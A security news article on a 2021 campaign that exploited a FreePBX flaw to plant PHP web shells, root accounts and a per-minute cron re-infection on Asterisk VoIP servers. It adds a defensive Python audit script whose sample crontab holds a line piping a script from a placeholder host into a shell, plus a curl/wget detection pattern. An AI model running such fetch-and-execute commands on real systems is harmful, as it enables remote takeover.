VoIP Servers targeted by Hackers by exploiting Digium Phone Software
An attack campaign targeted VoIP phones running Digium's software in order to drop a web shell on their servers. The web shell is designed to exfiltrate data and to download and execute additional payloads.
Reports stated that the malware first installs multilayer obfuscated PHP backdoors on the web server's file system. It then downloads new payloads for execution and schedules recurring tasks to re-infect the host.
This irregular activity is said to have begun in mid-December 2021. It targets Asterisk, a widely used software implementation of a private branch exchange (PBX), running on the open-source Elastix Unified Communications Server.
Reports stated that the intrusions resemble the INJ3CTOR3 campaign disclosed in November 2020 by Check Point, an Israeli cyber security firm, suggesting a possible resurgence of the earlier attacks.
The sudden surge coincides with the December 2021 public disclosure of a now-patched remote code execution flaw in FreePBX, a web-based open-source GUI that controls and manages Asterisk. The issue, tracked as CVE-2021-45461, is rated 9.8 out of 10 in severity.
The attack first retrieves an initial dropper shell script from a remote server, which in turn installs the PHP web shell in several locations on the file system. It also creates two root user accounts to maintain remote access.
A scheduled task is also created that runs every minute and fetches a fresh copy of the shell script from the attacker-controlled domain for execution.
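The two persistence mechanisms described above (extra UID 0 accounts and a per-minute cron job that fetches a remote script) are easy to check for on a PBX host. The following is an added example written for this article, not code from the report or from any vendor; the passwd and crontab lines are constructed samples, and the remote host name is a placeholder.

```python
import re

# Constructed sample input (not from the report): lines as they might appear in
# /etc/passwd and /etc/crontab on a compromised PBX host. example.invalid is a placeholder.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:1001:1001::/var/lib/asterisk:/sbin/nologin
sysadm:x:0:0::/home/sysadm:/bin/bash
"""

SAMPLE_CRONTAB = """# system crontab
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
* * * * * root curl -s http://example.invalid/update.sh | sh
"""

# A command that downloads something over HTTP with curl or wget.
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*\bhttps?://", re.IGNORECASE)


def extra_root_accounts(passwd_text):
    """Return account names other than 'root' whose UID field is 0."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


def every_minute_remote_cron(crontab_text):
    """Return crontab entries scheduled every minute whose command fetches over HTTP.

    Works for both /etc/crontab (with a user field) and per-user crontabs, because
    everything after the five schedule fields is searched as one string.
    """
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        if parts[:5] == ["*"] * 5 and REMOTE_FETCH.search(parts[5]):
            hits.append(line)
    return hits


def audit(passwd_text, crontab_text):
    """Combine both checks into one report dictionary."""
    return {
        "extra_root_accounts": extra_root_accounts(passwd_text),
        "remote_cron": every_minute_remote_cron(crontab_text),
    }
```

On a live host, feed the functions the contents of /etc/passwd, /etc/crontab and the files under /etc/cron.d and /var/spool/cron instead of the samples.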
The malware also allows the attackers to run arbitrary commands, take control of the system, steal information, and maintain a backdoor into the compromised hosts.
Researchers noted that this is a common approach malicious actors use to launch exploits or run commands remotely.